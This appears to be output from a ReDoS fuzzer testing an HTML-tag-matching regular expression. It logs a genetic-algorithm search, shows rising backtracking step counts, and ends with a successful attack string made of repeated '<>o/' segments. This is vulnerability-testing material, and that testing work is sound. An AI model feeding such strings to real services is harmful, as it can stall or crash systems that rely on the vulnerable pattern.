^ *<([^ >/]+) ?([^>]*)\/{0}>(?=[\s\S]*<\/\1>)((?:[\s\S]*?(?:<\1[^>]*>[\s\S]*?<\/\1>)*[\s\S]*?)*?)<\/\1>\n*
2: <55 : 18.95 : <</*<\/\1/*<\/\1><</*<\/\1/*<\/\1></*<\/\1/*<\/\1><</*<\/\1/*<\\/\1/*<\/\1></<>><50 : 782.1953125 : <</*<\/\1/*<\/\1><</*<\/\1/*<\/\1></*<\/\1/*<\/\1><</*<\/\1/*<\\/\1/*<\/\1></<>o^2KwX\(*o2@l>= \n(\wS0\*<)}^da<[\@<S\Y]9??\]@q:>
===Initiate End===
Node Coverage: 55/56
find attack string when init
===Genetic Algorithm End===
Node Coverage: 55/56
Vulnerable: <</*<\/\1/*<\/\1><</*<\/\1/*<\/\1></*<\/\1/*<\/\1><</*<\/\1/*<\\/\1/*<\/\1></<>o^2KwX\(*o2@l>= \n(\wS0\*<)}^da<[\@<S\Y]9??\]@q:
100121 : 782.1953125 : <</*<\/\1/*<\/\1><</*<\/\1/*<\/\1></*<\/\1/*<\/\1><</*<\/\1/*<\\/\1/*<\/\1></<>o^2KwX\(*o2@l>= \n(\wS0\*<)}^da<[\@<S\Y]9??\]@q:
100016 : 5264.0 : <<><<><</<>o^2KwX\
1000021 : <<><<><</<>o/<>o^2KwX\
1000227 : 26 : <<><<><</<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o^2KwX\
100000223 : <<><<><</<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o^2KwX\
TIME: 3.123330889 (s)
Attack success, attack string is:
<<><<><</<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o/<>o^2KwX\
